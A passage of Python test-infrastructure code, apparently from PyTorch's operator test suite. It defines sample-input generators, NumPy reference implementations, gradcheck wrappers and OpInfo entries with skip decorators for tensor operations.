SampleInput(make(shape), args=(make(shape),), kwargs=kwargs) for shape, kwargs in shapes_and_kwargs ] def sample_inputs_pixel_shuffle(op_info, device, dtype, requires_grad, **kwargs): return [ SampleInput( make_tensor((1, 9, 2, 2), device=device, dtype=dtype, requires_grad=requires_grad), kwargs=dict(upscale_factor=upscale_factor), ) for upscale_factor in (1, 3) ] def sample_inputs_pixel_unshuffle(op_info, device, dtype, requires_grad, **kwargs): return [ SampleInput( make_tensor((1, 1, 6, 6), device=device, dtype=dtype, requires_grad=requires_grad), kwargs=dict(downscale_factor=downscale_factor), ) for downscale_factor in (1, 3) ] def sample_inputs_binary_cross_entropy(op_info, device, dtype, requires_grad, logits=False, **kwargs): make = partial(make_tensor, device=device, dtype=dtype) make_prob = partial(make, low=0, high=1) reductions = ("mean", "sum", "none") shapes_and_kwargs = [ *[(shape, None) for shape in ((), (1,), (S,), (S, S), (S, S, S))], *[((S, S), dict(reduction=reduction)) for reduction in reductions], *[((S, S), dict(reduction=reduction, weight=make((S, S)))) for reduction in reductions], ] if logits: shapes_and_kwargs.extend( [((S, S), dict(reduction=reduction, pos_weight=make((S,), low=0))) for reduction in reductions] ) for shape, kwargs in shapes_and_kwargs: yield SampleInput( (make if logits else make_prob)(shape, requires_grad=requires_grad), args=(make_prob(shape, requires_grad=requires_grad),), kwargs=kwargs, ) def sample_inputs_allclose(op_info, device, dtype, requires_grad, **kwargs): samples = [] sample_shapes = [(), (S), (S, S, S)] atols = [1e-2, 1e-16] rtols = [1e-1, 0.5] eps = 1e-8 for s, rtol, atol in product(sample_shapes, rtols, atols): # close sample t = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) close = (t + atol).detach().requires_grad_(requires_grad) close_sample = SampleInput(t, args=(close,), kwargs=dict(rtol=rtol, atol=atol)) samples.append(close_sample) # random sample a = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) b = make_tensor(s, device=device, dtype=dtype, requires_grad=requires_grad) r_sample = SampleInput(a, args=(b,), kwargs=dict(rtol=rtol, atol=atol)) samples.append(r_sample) return samples def sample_inputs_l1_loss(op_info, device, dtype, requires_grad, **kwargs): yield from sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs) # In addition to the regular test cases, we add two for mixed floating point and complex inputs if dtype.is_complex: make = partial(make_tensor, (), device=device, requires_grad=requires_grad) yield SampleInput(make(dtype=dtype), args=(make(dtype=torch.double),)) yield SampleInput(make(dtype=torch.double), args=(make(dtype=dtype),)) def sample_inputs_smooth_l1_loss(op_info, device, dtype, requires_grad, **kwargs): yield from sample_inputs_loss(op_info, device, dtype, requires_grad, **kwargs) make = partial(make_tensor, (S, S), device=device, dtype=dtype, requires_grad=requires_grad) # This test case always triggers the smooth condition, since absolute difference of input and target # is smaller than beta yield SampleInput(make(low=0, high=2), args=(make(low=-2, high=0),), kwargs=dict(beta=5)) yield SampleInput(make(), args=(make(),), kwargs=dict(beta=0)) def sample_inputs_kl_div(op_info, device, dtype, requires_grad, **kwargs): make = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes_and_reduction = [ ((2,), "mean"), ((2, 3), "mean"), ((2, 3, 4), "mean"), ((2,), "none"), ((2,), "batchmean"), ((2,), "sum"), ] sample_inputs = [] for (shape, reduction), log_target in itertools.product(shapes_and_reduction, (True, False)): # input should be log-probability, i.e. lie in (-inf, 0] input = make(shape, low=None, high=0) # target should be a probability by default, i.e. lie in [0, 1], and a log-probability if log_target is set, # i.e. lie in (-inf, 0] target = make(shape, low=None, high=0) if log_target else make(shape, low=0, high=1) sample_inputs.append( SampleInput(input, args=(target,), kwargs=dict(reduction=reduction, log_target=log_target)) ) return sample_inputs def sample_inputs_pdist(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield from (SampleInput(make_input((n, m))) for n, m in itertools.product((1, S), repeat=2)) yield from (SampleInput(make_input((S, S)), kwargs=dict(p=p)) for p in (0.0, 1.0, 2.0, 10.0, float("inf"))) def reference_pdist(input, p=2): pdist = scipy.spatial.distance.pdist if p == 0: output = pdist(input, "hamming") * input.shape[1] elif p == float("inf"): output = pdist(input, lambda x, y: np.abs(x - y).max()) else: output = pdist(input, "minkowski", p=p) return output.astype(input.dtype) def sample_inputs_diagflat(op_info, device, dtype, requires_grad, **kwargs): make_input = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return [ SampleInput(make_input(())), SampleInput(make_input((2,))), SampleInput(make_input((2, 2))), SampleInput(make_input((2,)), kwargs=dict(offset=1)), SampleInput(make_input((2,)), kwargs=dict(offset=-1)), ] def sample_inputs_max_unpool(op_info, device, dtype, requires_grad, **kwargs): unpool_name_to_pool_method_dict = { 'nn.functional.max_unpool1d': torch.nn.functional.max_pool1d, 'nn.functional.max_unpool2d': torch.nn.functional.max_pool2d, 'nn.functional.max_unpool3d': torch.nn.functional.max_pool3d } unpool_name_to_dim = { 'nn.functional.max_unpool1d': 1, 'nn.functional.max_unpool2d': 2, 'nn.functional.max_unpool3d': 3 } unpool_to_pool_name_dict = dict(( (k, f'nn.functional.{v.__name__}') for k, v in unpool_name_to_pool_method_dict.items() )) pool_dim = unpool_name_to_dim[op_info.name] pool_method = unpool_name_to_pool_method_dict[op_info.name] pool_op_info = copy.copy(op_info) pool_op_info.name = unpool_to_pool_name_dict[op_info.name] for sample in sample_inputs_max_pool(pool_op_info, device, dtype, requires_grad, **kwargs): # shapes (C, ...) do not work as of now, # see https://github.com/pytorch/pytorch/issues/68337 # TODO: remove once the issue is resolved if sample.input.dim() != pool_dim + 2: continue # No dilation > 1 for max_unpool, # see https://github.com/pytorch/pytorch/issues/68420 if sample.kwargs['dilation'] != 1: continue # Can't unpool without indices if sample.kwargs['return_indices']: pool, indices = pool_method(sample.input, **sample.kwargs) # arg has to be a leaf arg = pool.detach().requires_grad_(requires_grad) sample_kwargs = { 'kernel_size': sample.kwargs['kernel_size'], 'stride': sample.kwargs['stride'], 'padding': sample.kwargs['padding'], # output_size could be None but we specify it explicitly # to compensate for the information lose in pool due # to the floor/ceil operation used to compute the shapes 'output_size': sample.input.size() } yield SampleInput(arg, args=(indices,), kwargs=sample_kwargs) def sample_inputs_max_unpool_grad(op_info, device, dtype, requires_grad, **kwargs): for sample in sample_inputs_max_unpool(op_info, device, dtype, requires_grad, **kwargs): indices = sample.args[0] # The samples for max_unpool are generated with max_pool. # It could be that a single element from the max_pool's # input is mapped to several locations in its output. # This situation leads to failed gradchecks because # the finite difference algorithm perturbes the elements # of the output one by one, and not in classes of # equivalences determined by whether two elements # in the output are coming from the same location in the # input (simply put, they have the same corresponding index). # So, there are two ways to resolve this issue: # 1. Extract a pertubation for one element and apply it all # the elements from the same equivalence class, or # 2. Make sure that the equivalence classes are all singletons, # i.e. the index tensor has to be comprised of only unique # indices. # Here we go with the solution 2, the easiest of all. if indices.unique().numel() == indices.numel(): yield sample foreach_unary_op_db: List[OpInfo] = [ ForeachFuncInfo('exp'), ForeachFuncInfo('acos'), ForeachFuncInfo('asin'), ForeachFuncInfo('atan'), ForeachFuncInfo('cos'), ForeachFuncInfo('cosh'), ForeachFuncInfo('log'), ForeachFuncInfo('log10'), ForeachFuncInfo('log2'), ForeachFuncInfo('tan'), ForeachFuncInfo('tanh'), ForeachFuncInfo('sin'), ForeachFuncInfo('sinh'), ForeachFuncInfo( 'neg', dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex(), sample_inputs_func=sample_inputs_foreach, ), ForeachFuncInfo( 'sqrt', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half), ), ForeachFuncInfo( 'ceil', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'erf', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'erfc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'expm1', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'floor', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'log1p', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'round', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'frac', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'reciprocal', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'sigmoid', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'trunc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'abs', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), ] foreach_binary_op_db: List[OpInfo] = [ ForeachFuncInfo( "add", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_alpha_param=True, ), ForeachFuncInfo( "sub", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_alpha_param=True, ), ForeachFuncInfo( "mul", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), skips=( # Ref: https://github.com/pytorch/pytorch/issues/77946 DecorateInfo(unittest.skip("Unable to reproduce failure locally"), "TestForeach", "test_binary_op_scalarlist_fastpath", device_type='cuda', dtypes=(torch.float16,)), ) ), ForeachFuncInfo( "div", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), skips=( # Ref: https://github.com/pytorch/pytorch/issues/77946 DecorateInfo(unittest.skip("Unable to reproduce failure locally"), "TestForeach", "test_binary_op_scalarlist_fastpath", device_type='cuda', dtypes=(torch.float16,)), ) ), ] foreach_pointwise_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "addcmul", dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( "addcdiv", dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), ), ] foreach_minmax_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "maximum", dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bool), ), ForeachFuncInfo( "minimum", dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bool), ), ] foreach_reduce_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "norm", dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), ), ] def reference_sign(x): if x.dtype == np.bool_: # `np.sign` doesn't support `bool`. # >>> np.sign(True) # ufunc 'sign' did not contain a loop # with signature matching types dtype('bool') -> dtype('bool') return np.sign(x, dtype=np.uint8).astype(np.bool_) return np.sign(x) def reference_sgn(x): # NumPy doesn't have an equivalent to `torch.sgn` when the dtype is complex. # For complex inputs, `np.sign` returns sign(x.real) + 0j if x.real != 0 else sign(x.imag) + 0j. # while `torch.sgn` returns, 0 if abs(input) == 0 else input/abs(input) if x.dtype not in [np.complex64, np.complex128]: return reference_sign(x) out = (x / np.abs(x)) if out.ndim == 0: # Handle x == 0 case if (x == 0): # Can't assign to np.complex object # So make a new one. return np.array(complex(0, 0), dtype=x.dtype) return out # Handle x == 0 case mask = (x == 0) out[mask] = complex(0, 0) return out def reference_sigmoid(x): # 'scipy.special.expit' not supported for the input types if x.dtype in [np.complex64, np.complex128]: return (1 / (1 + np.exp(-x))) return scipy.special.expit(x) def reference_logsigmoid(x): return np.where( x < 0, x - np.log1p(np.exp(x)), -np.log1p(np.exp(-x))) def reference_hardsigmoid(x): intermediate = x / 6 + 0.5 y = np.clip(intermediate, 0, None) return np.where(y > 1, 1, y).astype(x.dtype) def reference_lgamma(x): # scipy.special.gammaln returns `-inf` when input is `-inf`. # While Pytorch, C and C++, all return `inf` when input is `-inf`. # Reference: # https://en.cppreference.com/w/cpp/numeric/math/lgamma # https://en.cppreference.com/w/c/numeric/math/lgamma # To handle the above discrepancy, # we replace -inf with inf so values # that were originally -inf map to inf as expected if x.dtype.kind == 'f': x = np.where(x == float('-inf'), np.array(float('inf'), dtype=x.dtype), x) out = scipy.special.gammaln(x) if x.dtype == np.float16: # `scipy.special.gammaln` returns output of float32 when input is float16, # while `torch.lgamma` preserves `float16`. But due to smaller range of float16, # Pytorch version outputs `inf` while SciPy returns finite values. out = out.astype(np.float16) return out def reference_polygamma(x, n): # WEIRD `scipy.special.polygamma` behavior # >>> scipy.special.polygamma(0, np.array(501, dtype=np.float32)).dtype # dtype('float64') # >>> scipy.special.polygamma(0, np.array([501], dtype=np.float32)).dtype # dtype('float32') # # Thus we cast output to the default torch dtype or preserve double result_dtype = torch_to_numpy_dtype_dict[torch.get_default_dtype()] if x.dtype == np.double: result_dtype = np.double return scipy.special.polygamma(n, x).astype(result_dtype) def reference_mvlgamma(x, d): if x.dtype == np.float16: return scipy.special.multigammaln(x, d).astype(np.float16) return scipy.special.multigammaln(x, d) def reference_softplus(input, beta=1, threshold=20): non_linear = input * beta <= threshold output = input.copy() output[non_linear] = np.log(1 + np.exp(beta * input[non_linear])) / beta return output def reference_gelu(X, *, approximate='none'): def _gelu_ref(X): return X * stats.norm.cdf(X) def _tanh_gelu_ref(X): M_SQRT_2_PI = math.sqrt(2 / math.pi) Z = M_SQRT_2_PI * (X + 0.044715 * np.power(X, 3.0)) return 0.5 * X * (1.0 + np.tanh(Z)) if approximate == 'tanh': return _tanh_gelu_ref(X) else: return _gelu_ref(X) def reference_one_hot(a: np.ndarray, num_classes: int = -1) -> np.ndarray: if num_classes == -1: num_classes = int(np.amax(a) + 1) idcs = a.reshape(-1) + np.arange(0, a.size, dtype=np.int64) * num_classes one_hot = np.zeros((a.size, num_classes), dtype=a.dtype) np.put(one_hot, idcs, 1) return one_hot.reshape(*a.shape, -1) def reference_mse_loss(input, target, reduction="mean"): se = (input - target) ** 2 if reduction == "mean": return np.mean(se) elif reduction == "sum": return np.sum(se) else: # reduction == "none" return se def wrapper_set_seed(op, *args, **kwargs): """Wrapper to set seed manually for some functions like dropout See: https://github.com/pytorch/pytorch/pull/62315#issuecomment-896143189 for more details. """ with freeze_rng_state(): torch.manual_seed(42) return op(*args, **kwargs) def reference_layer_norm(inp: np.ndarray, normalized_shape: Tuple[int], weight=None, bias=None, eps=1e-5): feature_size = np.prod(normalized_shape) inp_view = inp.reshape(-1, feature_size) # type: ignore[call-overload] mean = inp_view.mean(axis=-1, keepdims=True) var = inp_view.var(axis=-1, ddof=0, keepdims=True) Y = (inp_view - mean) / np.sqrt(var + eps) if weight is None and bias is not None: Y = Y + bias.reshape(-1) elif weight is not None and bias is None: Y = Y * weight.reshape(-1) elif weight is not None and bias is not None: Y = Y * weight.reshape(-1) + bias.reshape(-1) return Y.reshape(*inp.shape) def reference_group_norm(inp: np.ndarray, num_groups: int, weight=None, bias=None, eps=1e-5): inp_view = inp if np.prod(inp.shape) != 0: inp_view = inp.reshape((inp.shape[0], num_groups, -1)) mean = inp_view.mean(axis=-1, keepdims=True) var = inp_view.var(axis=-1, ddof=0, keepdims=True) Y = (inp_view - mean) / np.sqrt(var + eps) Y = Y.reshape(inp.shape) if weight is not None: # weight is a vector of length equal to the channel if len(Y.shape) > 2: weight = np.tile(np.expand_dims(weight, 1), [1] + list(inp.shape[2:])) Y = Y * weight if bias is not None: # bias is a vector of length equal to the channel if len(Y.shape) > 2: bias = np.tile(np.expand_dims(bias, 1), [1] + list(inp.shape[2:])) Y = Y + bias return Y # using a custom reference function since numpy only has a string side arg (instead of right and side) and doesn't # have an out_int32 arg. Additionally, numpy doesn't support searchsorted with ND arrays, so this splits those into # stacked 1D cases def reference_searchsorted(sorted_sequence, boundary, out_int32=False, right=False, side='left', sorter=None): side = 'right' if (right or side == 'right') else 'left' if len(sorted_sequence.shape) == 1 : ret = np.searchsorted(sorted_sequence, boundary, side=side, sorter=sorter) return ret.astype(np.int32) if out_int32 else ret elif sorted_sequence.shape[0] == 0: if sorter is not None: sorter = sorter.flatten() ret = np.searchsorted(sorted_sequence.flatten(), boundary.flatten(), side=side, sorter=sorter) ret = ret.astype(np.int32) if out_int32 else ret return ret.reshape(boundary.shape) else: # numpy searchsorted only supports 1D inputs so we split up ND inputs orig_shape = boundary.shape num_splits = np.prod(sorted_sequence.shape[:-1]) splits = range(0, num_splits) sorted_sequence, boundary = sorted_sequence.reshape(num_splits, -1), boundary.reshape(num_splits, -1) if sorter is not None: sorter = sorter.reshape(num_splits, -1) split_sequence = [sorted_sequence[i] for i in splits] split_boundary = [boundary[i] for i in splits] split_sorter = [sorter[i] if (sorter is not None) else None for i in splits] split_ret = [np.searchsorted(s_seq, b, side=side, sorter=s_sort) for (s_seq, b, s_sort) in zip(split_sequence, split_boundary, split_sorter)] split_ret = [i.astype(np.int32) for i in split_ret] if out_int32 else split_ret return np.stack(split_ret).reshape(orig_shape) def gradcheck_wrapper_hermitian_input(op, input, *args, **kwargs): """Gradcheck wrapper for functions that take Hermitian matrices as input. They require a modified function because the finite-difference algorithm for calculating derivatives does not preserve the Hermitian property of the input. """ return op(input + input.mH, *args, **kwargs) def gradcheck_wrapper_triangular_input(op, *args, upper=False, idx=0, **kwargs): """Gradcheck wrapper for functions that take lower or upper triangular matrices as input. They require a modified function because the finite-difference algorithm for calculating derivatives does not preserve the triangular property of the input. `idx` is used to specific which `args[idx]` is to be triangularized. """ triangular_arg = args[idx].triu() if upper else args[idx].tril() return op(*args[:idx], triangular_arg, *args[idx + 1:], upper, **kwargs) def gradcheck_wrapper_triangular_input_real_positive_diagonal(op, *args, upper=False, idx=0, **kwargs): """Gradcheck wrapper for functions that take lower/upper triangular matrices with real and positive diagonals, for example, cholesky-like operations. """ arg = args[idx] arg_diag = arg.diagonal(0, -2, -1) arg_diag_embed = torch.diag_embed(arg_diag) id_diag_tensor = torch.ones_like(arg_diag) id_tensor = torch.diag_embed(id_diag_tensor) # new_arg = arg - diag(arg) + I new_arg = arg - arg_diag_embed + id_tensor return gradcheck_wrapper_triangular_input( op, *args[:idx], new_arg, *args[idx + 1:], upper=upper, idx=idx, **kwargs ) def gradcheck_wrapper_masked_operation(op, input, *args, **kwargs): """Gradcheck wrapper for masked operations. When mask is specified, replaces masked-out elements with zeros. Use for operations that produce non-finite masked-out elements, for instance, for minimum and maximum reductions. """ output = op(input, *args, **kwargs) mask = kwargs.get('mask') if mask is not None: output_mask = torch._masked._output_mask(op, input, *args, **kwargs) output = torch.where(output_mask, output, output.new_zeros([])) return output def reference_reduction_numpy(f, supports_keepdims=True): """Wraps a NumPy reduction operator. The wrapper function will forward dim, keepdim, mask, and identity kwargs to the wrapped function as the NumPy equivalent axis, keepdims, where, and initiak kwargs, respectively. Args: f: NumPy reduction operator to wrap supports_keepdims (bool, optional): Whether the NumPy operator accepts keepdims parameter. If it does not, the wrapper will manually unsqueeze the reduced dimensions if it was called with keepdim=True. Defaults to True. Returns: Wrapped function """ @wraps(f) def wrapper(x: np.ndarray, *args, **kwargs): # Copy keys into a set keys = set(kwargs.keys()) dim = kwargs.pop('dim', None) keepdim = kwargs.pop('keepdim', False) if 'dim' in keys: dim = tuple(dim) if isinstance(dim, Sequence) else dim # NumPy reductions don't accept dim=0 for scalar inputs # so we convert it to None if and only if dim is equivalent if x.ndim == 0 and dim in {0, -1, (0,), (-1,)}: kwargs['axis'] = None else: kwargs['axis'] = dim if 'keepdim' in keys and supports_keepdims: kwargs['keepdims'] = keepdim if 'mask' in keys: mask = kwargs.pop('mask') if mask is not None: assert mask.layout == torch.strided kwargs['where'] = mask.cpu().numpy() if 'identity' in keys: identity = kwargs.pop('identity') if identity is not None: if identity.dtype is torch.bfloat16: identity = identity.cpu().to(torch.float32) else: identity = identity.cpu() kwargs['initial'] = identity.numpy() if 'unbiased' in keys: unbiased = kwargs.pop('unbiased') if unbiased is not None: kwargs['ddof'] = int(unbiased) result = f(x, *args, **kwargs) # Unsqueeze reduced dimensions if NumPy does not support keepdims if keepdim and not supports_keepdims and x.ndim > 0: dim = list(range(x.ndim)) if dim is None else dim result = np.expand_dims(result, dim) return result return wrapper def loss_reference_reduction_wrapper(fn): def wrapper(input, target, *, size_average=None, reduce=None, reduction="mean", **other_kwargs): if size_average is not None or reduce is not None: raise RuntimeError( "The keyword arguments 'size_average' and 'reduce' are deprecated and not supported by this wrapper" ) output = fn(input, target, **other_kwargs) if reduction == "mean": return np.mean(output) elif reduction == "sum": return np.sum(output) else: # reduction == "none" return output return wrapper @loss_reference_reduction_wrapper def reference_smooth_l1_loss(input, target, beta=1.0): diff = input - target abs_diff = np.abs(diff) above_threshold = abs_diff >= beta loss = np.empty_like(input) loss[above_threshold] = abs_diff[above_threshold] - 0.5 * beta loss[~above_threshold] = diff[~above_threshold] ** 2 / (2 * beta) return loss def reference_std_var(f): """Forwards unbiased/correction kwargs as NumPy's equivalent ddof""" g = reference_reduction_numpy(f) @wraps(g) def wrapper(x: np.ndarray, *args, **kwargs): assert not ('unbiased' in kwargs and 'correction' in kwargs) if 'unbiased' in kwargs: kwargs['ddof'] = int(kwargs.pop('unbiased')) elif 'correction' in kwargs: kwargs['ddof'] = kwargs.pop('correction') return g(x, *args, **kwargs) return wrapper def generate_std_var_kwargs(t: torch.Tensor, **kwargs): """Generates unbiased/correction kwargs for std/var operators""" yield ((), {'unbiased': True}) yield ((), {'unbiased': False}) # Currently, calling std with correction is only enabled when # both dim and keepdim are provided. if 'dim' in kwargs and 'keepdim' in kwargs: yield ((), {'correction': 0}) yield ((), {'correction': 1}) numel = torch.tensor(t.shape)[kwargs.get('dim')].prod() yield ((), {'correction': numel // 2}) def error_inputs_mean(op_info, device, **kwargs): err_msg1 = (r"mean\(\): could not infer output dtype. " r"Input dtype must be either a floating point or complex dtype. " r"Got: Long") si1 = SampleInput( make_tensor((3, 4, 5), dtype=torch.int64, device=device), args=([],)) err_msg2 = (r"mean\(\): could not infer output dtype. " r"Optional dtype must be either a floating point or complex dtype. " r"Got: Long") si2 = SampleInput( make_tensor((3, 4, 5), dtype=torch.float32, device=device), args=([],), kwargs={"dtype": torch.int64}) err_msg3 = "Expected out tensor to have dtype double, but got float instead" si3 = SampleInput( make_tensor((3, 4, 5), dtype=torch.int64, device=device), args=([],), kwargs={ "dtype": torch.float64, "out": make_tensor([], dtype=torch.float32, device=device), }) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2), ErrorInput(si3, error_regex=err_msg3)) # Operator database (sorted alphabetically) op_db: List[OpInfo] = [ UnaryUfuncInfo('abs', aliases=('absolute', ), ref=np.abs, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), skips=( # Inplace abs doesn't support complex inputs DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_grad', dtypes=(torch.cdouble,)), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_gradgrad', dtypes=(torch.cdouble,)), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=(torch.cdouble,)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat]), # Reference: https://github.com/pytorch/pytorch/issues/49224 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.int8], active_if=TEST_WITH_ASAN), # TODO: Fix test_out_arg_all_dtypes as torch.empty_like(expected_output) where expected_output=op(input) # We can break the logic of the loop over all possible types but it is OK. # https://github.com/pytorch/pytorch/blob/master/test/test_unary_ufuncs.py#L440-L449 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_out_arg_all_dtypes', dtypes=[torch.cfloat, torch.cdouble]), # The complex formula might be wrong DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=complex_types()), # Forward-over-reverse gradgrad might be wrong for complex (see above): DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # add_out_op2_sparse_csr DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), supports_fwgrad_bwgrad=True, assert_autodiffed=True, supports_sparse_csr=True, supports_forward_ad=True), # NOTE: CPU complex acos produces incorrect outputs (https://github.com/pytorch/pytorch/issues/42952) UnaryUfuncInfo('acos', aliases=('arccos', ), ref=np.arccos, domain=(-1, 1), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-1, torch.complex64: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_method_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=[torch.cdouble], active_if=IS_WINDOWS), )), # NOTE: the derivative for inplace acosh is not implemented UnaryUfuncInfo('acosh', aliases=('arccosh', ), ref=np.arccosh, domain=(1, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), # "rsqrt_cuda" not implemented for 'BFloat16' backward_dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 